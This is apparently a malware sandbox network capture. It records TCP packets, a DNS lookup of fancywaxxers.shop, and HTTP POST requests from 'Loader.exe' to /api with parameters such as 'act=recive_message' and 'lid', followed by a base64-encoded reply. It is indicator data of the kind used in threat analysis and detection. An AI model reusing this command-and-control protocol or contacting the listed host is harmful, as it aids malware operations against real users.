                                                                                        Dec 31, 2024 17:38:40.377929926 CET44349792104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:40.378037930 CET44349792104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:40.378087044 CET49792443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:40.378282070 CET49792443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:40.378300905 CET44349792104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:40.549982071 CET49800443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:40.550024033 CET44349800104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:40.550088882 CET49800443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:40.550369024 CET49800443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:40.550384998 CET44349800104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:41.042989969 CET44349800104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:41.043154001 CET49800443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:41.051495075 CET49800443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:41.051527023 CET44349800104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:41.051776886 CET44349800104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:41.053881884 CET49800443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:41.054013014 CET49800443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:41.054040909 CET44349800104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:41.054100037 CET49800443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:41.099323988 CET44349800104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:42.604005098 CET44349800104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:42.604134083 CET44349800104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:42.604183912 CET49800443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:42.604362011 CET49800443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:42.604379892 CET44349800104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:42.911978960 CET49815443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:42.912010908 CET44349815104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:42.912230015 CET49815443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:42.912655115 CET49815443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:42.912664890 CET44349815104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:43.396503925 CET44349815104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:43.396651983 CET49815443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:43.398169041 CET49815443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:43.398180008 CET44349815104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:43.398420095 CET44349815104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:43.399655104 CET49815443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:43.399779081 CET49815443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:43.399807930 CET44349815104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:43.399884939 CET49815443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:43.399894953 CET44349815104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:44.153351068 CET44349815104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:44.153446913 CET44349815104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:44.153567076 CET49815443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:44.153784990 CET49815443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:44.153804064 CET44349815104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:44.882107019 CET49827443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:44.882162094 CET44349827104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:44.882276058 CET49827443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:44.882618904 CET49827443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:44.882633924 CET44349827104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:45.340277910 CET44349827104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:45.340382099 CET49827443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:45.341649055 CET49827443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:45.341655016 CET44349827104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:45.341906071 CET44349827104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:45.343123913 CET49827443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:45.343239069 CET49827443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:45.343245029 CET44349827104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:46.344903946 CET44349827104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:46.344996929 CET44349827104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:46.345065117 CET49827443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:46.345232010 CET49827443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:46.345252991 CET44349827104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:46.846610069 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:46.846658945 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:46.846728086 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:46.847084999 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:46.847099066 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.321428061 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.321563959 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.322927952 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.322952032 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.323199987 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.324887037 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.325597048 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.325635910 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.326561928 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.326601028 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.327703953 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.327759027 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.327928066 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.327969074 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.328129053 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.328180075 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.328360081 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.328407049 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.328418016 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.328425884 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.328615904 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.328653097 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.328682899 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.328700066 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.328809023 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.328850031 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.336586952 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.336781025 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.336833000 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.336864948 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.336889982 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.336931944 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.336947918 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:47.336986065 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:47.337006092 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:48.960253000 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:48.960371017 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:48.960442066 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:48.960532904 CET49842443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:48.960544109 CET44349842104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:48.970010996 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:48.970051050 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:48.970144033 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:48.970432997 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:48.970448017 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.423799992 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.423943043 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.425410986 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.425422907 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.425671101 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.426866055 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.426902056 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.426939011 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.900968075 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.901030064 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.901107073 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.901119947 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.901129961 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.901182890 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.901209116 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.901216984 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.901258945 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.901650906 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.901911020 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.901958942 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.901988983 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.901998997 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.902039051 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.902040958 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.902054071 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.902103901 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.902735949 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.902851105 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.902909040 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.902971983 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.902976036 CET44349858104.21.80.1192.168.2.5
                                                                                        Dec 31, 2024 17:38:49.903000116 CET49858443192.168.2.5104.21.80.1
                                                                                        Dec 31, 2024 17:38:49.903003931 CET44349858104.21.80.1192.168.2.5
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 31, 2024 17:38:09.045715094 CET6517353192.168.2.51.1.1.1
                                                                                        Dec 31, 2024 17:38:09.055866957 CET53651731.1.1.1192.168.2.5
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 31, 2024 17:38:09.045715094 CET192.168.2.51.1.1.10xa317Standard query (0)fancywaxxers.shopA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 31, 2024 17:38:09.055866957 CET1.1.1.1192.168.2.50xa317No error (0)fancywaxxers.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:38:09.055866957 CET1.1.1.1192.168.2.50xa317No error (0)fancywaxxers.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:38:09.055866957 CET1.1.1.1192.168.2.50xa317No error (0)fancywaxxers.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:38:09.055866957 CET1.1.1.1192.168.2.50xa317No error (0)fancywaxxers.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:38:09.055866957 CET1.1.1.1192.168.2.50xa317No error (0)fancywaxxers.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:38:09.055866957 CET1.1.1.1192.168.2.50xa317No error (0)fancywaxxers.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:38:09.055866957 CET1.1.1.1192.168.2.50xa317No error (0)fancywaxxers.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                        • fancywaxxers.shop
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549704104.21.80.14436472C:\Users\user\Desktop\Loader.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:38:09 UTC264OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:38:09 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-12-31 16:38:37 UTC1127INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:38:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=mbbruu8q5nqg0v2uenu8pdh7q5; expires=Sat, 26 Apr 2025 10:25:16 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3r90XXXqlgIO5paV9pMgcymeew4LucO7ONsXr%2BC0rLgmBr9181ez1W1TFXRXNspztaYSxrhvSheAkdoYZaKKAfrI2A62DyDqIk9eRLcZip8FSoSrwJ4vp6IWWJg3knFcqT3Z8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb2c67cbe8c0f-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1946&rtt_var=750&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1439842&cwnd=223&unsent_bytes=0&cid=ccc5f444d74acfb9&ts=28285&x=0"
                                                                                        2024-12-31 16:38:37 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-12-31 16:38:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.549781104.21.80.14436472C:\Users\user\Desktop\Loader.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:38:38 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 52
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:38:38 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 38 30 39 32 32 34 31 30 33 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--5809224103&j=
                                                                                        2024-12-31 16:38:38 UTC1127INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:38:38 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=vt7ne1f2q92go9qgvou3bldfqo; expires=Sat, 26 Apr 2025 10:25:17 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EOlYiwQSWThwRfAf4Wu%2Bh98gVEtpocQeLqtNhnGrAaawPJIo6UJLlXTIQGZFmHqV%2BX72pdNxj1meHPBciiIAIq9qIpbJsaWp5ewVbkcQs19bSAY0JrpBLYDTudJVQDyfPieHOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb379f87e42d2-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1551&rtt_var=597&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=953&delivery_rate=1810291&cwnd=229&unsent_bytes=0&cid=bff52d35bf23b591&ts=486&x=0"
                                                                                        2024-12-31 16:38:38 UTC242INData Raw: 34 39 39 34 0d 0a 46 4e 44 57 53 56 5a 57 47 79 64 6e 45 4f 35 66 62 79 37 66 65 67 58 73 34 79 79 66 51 4a 36 35 63 38 48 70 68 46 56 50 52 48 5a 76 38 71 42 72 62 47 49 33 42 52 52 31 7a 47 55 62 58 4b 6f 66 4b 63 36 43 53 4c 31 36 2b 4e 67 66 73 6f 79 6f 64 7a 6b 70 56 43 36 32 74 79 55 6c 4d 7a 63 46 41 6d 6a 4d 5a 54 52 56 2f 52 39 72 7a 74 6b 4f 2b 69 72 38 32 42 2b 6a 69 4f 38 36 50 79 67 56 66 4c 79 78 49 54 4d 31 66 30 59 4c 66 59 73 36 43 6b 2b 31 46 47 79 42 69 30 47 39 62 4c 7a 63 43 65 50 54 70 68 67 71 4d 42 64 5a 73 61 55 69 64 43 73 33 58 45 56 31 67 48 31 56 44 4c 34 66 5a 34 43 46 53 50 51 6f 39 74 45 58 6f 6f 33 75 4a 53 59 69 48 6e 79 79 73 69 41 35 50 47 74 4c 41 58 71 41 50 41 42 50 2f 56 59 6e
                                                                                        Data Ascii: 4994FNDWSVZWGydnEO5fby7fegXs4yyfQJ65c8HphFVPRHZv8qBrbGI3BRR1zGUbXKofKc6CSL16+NgfsoyodzkpVC62tyUlMzcFAmjMZTRV/R9rztkO+ir82B+jiO86PygVfLyxITM1f0YLfYs6Ck+1FGyBi0G9bLzcCePTphgqMBdZsaUidCs3XEV1gH1VDL4fZ4CFSPQo9tEXoo3uJSYiHnyysiA5PGtLAXqAPABP/VYn
                                                                                        2024-12-31 16:38:38 UTC1369INData Raw: 69 5a 6b 4f 70 57 4b 76 36 52 4b 79 6d 76 4d 36 50 53 42 55 61 66 79 74 61 7a 4d 34 4f 52 31 46 65 6f 41 7a 43 45 2b 79 48 32 61 4f 6b 30 48 39 49 66 54 54 46 61 6d 45 36 54 67 6a 4c 42 4e 2b 75 37 4d 6b 4d 7a 78 2f 53 67 59 79 77 6e 30 4b 56 50 31 41 4a 36 36 52 54 66 34 32 38 63 70 52 76 4d 58 2f 64 79 6f 71 56 43 37 79 73 69 55 31 4f 58 6c 58 44 58 6d 48 4f 42 39 48 74 42 56 71 6a 6f 78 45 38 69 48 38 33 42 75 70 68 4f 77 7a 49 43 73 53 64 72 4c 30 5a 58 51 7a 59 51 56 64 4d 71 38 34 48 55 75 78 44 69 57 30 77 56 47 7a 4f 37 7a 63 48 65 50 54 70 6a 38 6f 4a 52 64 39 76 62 63 6a 50 79 5a 35 56 77 4e 2f 69 53 38 4c 53 62 4d 53 5a 4a 79 4c 51 50 73 68 39 64 41 59 70 6f 7a 69 64 32 4e 6d 45 32 37 79 37 47 73 56 4f 58 4a 4a 44 32 57 4d 66 52 49 43 70 46 68
                                                                                        Data Ascii: iZkOpWKv6RKymvM6PSBUafytazM4OR1FeoAzCE+yH2aOk0H9IfTTFamE6TgjLBN+u7MkMzx/SgYywn0KVP1AJ66RTf428cpRvMX/dyoqVC7ysiU1OXlXDXmHOB9HtBVqjoxE8iH83BuphOwzICsSdrL0ZXQzYQVdMq84HUuxDiW0wVGzO7zcHePTpj8oJRd9vbcjPyZ5VwN/iS8LSbMSZJyLQPsh9dAYpozid2NmE27y7GsVOXJJD2WMfRICpFh
                                                                                        2024-12-31 16:38:38 UTC1369INData Raw: 50 73 74 38 64 64 52 37 63 76 68 4c 32 31 2b 56 46 79 78 6f 43 67 2b 64 6b 78 47 43 33 79 4c 4b 30 31 54 38 77 45 6e 69 59 30 4f 70 57 4c 78 32 68 6d 6c 6d 65 6b 36 4c 69 67 61 65 62 65 37 49 7a 51 30 64 45 41 42 65 59 63 2b 41 45 69 76 45 6d 65 47 68 45 2f 33 4b 4c 79 56 55 61 53 54 70 6d 39 74 46 77 4e 39 38 49 45 6f 4f 6a 70 2b 55 30 56 74 77 69 52 4e 53 37 46 59 50 38 36 4d 52 76 67 6e 38 39 6f 62 72 59 37 73 4f 79 55 6f 46 32 53 39 73 43 73 34 50 48 4e 49 43 33 61 45 4e 41 5a 48 75 78 68 6d 68 4d 45 41 76 53 58 6b 6d 30 6e 6a 76 2b 45 37 49 43 6c 57 51 37 47 36 4a 54 4d 69 4f 56 70 4c 61 38 77 36 41 51 7a 6c 57 47 75 48 67 55 58 33 4a 76 7a 63 48 4b 61 49 34 54 51 67 49 52 35 34 74 62 41 6e 50 54 6c 2f 52 51 4a 32 69 53 38 49 52 62 45 55 4a 38 44 42
                                                                                        Data Ascii: Pst8ddR7cvhL21+VFyxoCg+dkxGC3yLK01T8wEniY0OpWLx2hmlmek6Ligaebe7IzQ0dEABeYc+AEivEmeGhE/3KLyVUaSTpm9tFwN98IEoOjp+U0VtwiRNS7FYP86MRvgn89obrY7sOyUoF2S9sCs4PHNIC3aENAZHuxhmhMEAvSXkm0njv+E7IClWQ7G6JTMiOVpLa8w6AQzlWGuHgUX3JvzcHKaI4TQgIR54tbAnPTl/RQJ2iS8IRbEUJ8DB
                                                                                        2024-12-31 16:38:38 UTC1369INData Raw: 4c 43 55 61 53 48 70 6d 39 74 4c 78 31 6b 76 4c 6f 69 4f 54 4a 78 51 67 74 2f 68 7a 73 47 53 37 6f 65 61 6f 61 4d 53 2f 34 6a 2b 4e 45 44 6f 49 44 73 4f 69 64 6d 57 6a 61 31 72 47 74 73 64 46 35 4a 4c 47 4b 58 4c 78 73 4d 6f 6c 5a 2b 7a 6f 5a 43 76 58 71 38 32 42 36 71 68 4f 34 2f 49 69 6b 51 65 4c 53 79 4a 6a 45 37 63 31 63 4e 66 49 45 32 41 6b 65 76 47 47 71 4b 6a 55 72 31 4b 66 61 62 58 2b 4f 4d 2f 6e 64 31 5a 69 46 37 76 62 51 6f 49 6e 52 6d 43 78 77 79 69 7a 46 4e 46 50 30 55 61 59 36 4f 51 76 45 70 39 4e 6f 64 72 59 7a 6a 50 69 55 75 42 6e 65 32 76 43 6f 36 4f 33 68 42 41 48 65 49 4f 67 6c 4b 73 6c 67 70 7a 6f 5a 57 76 58 71 38 39 44 61 57 79 63 63 4e 62 54 6c 61 62 2f 4b 7a 4a 33 52 73 4f 55 6b 47 66 6f 51 79 43 30 57 78 45 6d 36 46 6a 55 58 35 4c
                                                                                        Data Ascii: LCUaSHpm9tLx1kvLoiOTJxQgt/hzsGS7oeaoaMS/4j+NEDoIDsOidmWja1rGtsdF5JLGKXLxsMolZ+zoZCvXq82B6qhO4/IikQeLSyJjE7c1cNfIE2AkevGGqKjUr1KfabX+OM/nd1ZiF7vbQoInRmCxwyizFNFP0UaY6OQvEp9NodrYzjPiUuBne2vCo6O3hBAHeIOglKslgpzoZWvXq89DaWyccNbTlab/KzJ3RsOUkGfoQyC0WxEm6FjUX5L
                                                                                        2024-12-31 16:38:38 UTC1369INData Raw: 73 69 75 63 78 50 79 45 64 5a 4c 79 35 4a 44 77 38 63 45 51 42 64 34 45 37 41 55 61 38 48 32 6d 41 69 51 36 7a 59 76 76 44 55 66 76 4c 78 79 63 32 4e 41 4a 37 6b 37 6b 6b 64 43 73 33 58 45 56 31 67 48 31 56 44 4c 51 4b 59 34 4f 54 52 2f 6f 73 38 39 67 44 6f 6f 62 74 4a 53 6f 70 45 48 47 2b 73 69 51 79 4e 58 78 50 43 58 57 4a 4e 67 4a 41 2f 56 59 6e 69 5a 6b 4f 70 57 4c 53 30 41 4b 30 69 4f 67 38 4f 7a 31 55 61 66 79 74 61 7a 4d 34 4f 52 31 46 63 59 63 32 43 55 79 78 47 47 4f 44 67 56 7a 79 4a 66 76 53 47 72 47 42 34 54 41 6d 4c 68 39 35 74 4b 59 6e 4f 69 5a 38 56 78 63 79 77 6e 30 4b 56 50 31 41 4a 37 69 47 58 75 30 68 76 75 6f 48 6f 4a 33 74 4f 69 46 6d 43 7a 69 72 39 43 77 34 64 43 45 46 41 33 32 46 50 67 4a 4e 74 42 52 71 69 34 68 4c 2f 43 54 34 30 52
                                                                                        Data Ascii: siucxPyEdZLy5JDw8cEQBd4E7AUa8H2mAiQ6zYvvDUfvLxyc2NAJ7k7kkdCs3XEV1gH1VDLQKY4OTR/os89gDoobtJSopEHG+siQyNXxPCXWJNgJA/VYniZkOpWLS0AK0iOg8Oz1UafytazM4OR1FcYc2CUyxGGODgVzyJfvSGrGB4TAmLh95tKYnOiZ8Vxcywn0KVP1AJ7iGXu0hvuoHoJ3tOiFmCzir9Cw4dCEFA32FPgJNtBRqi4hL/CT40R
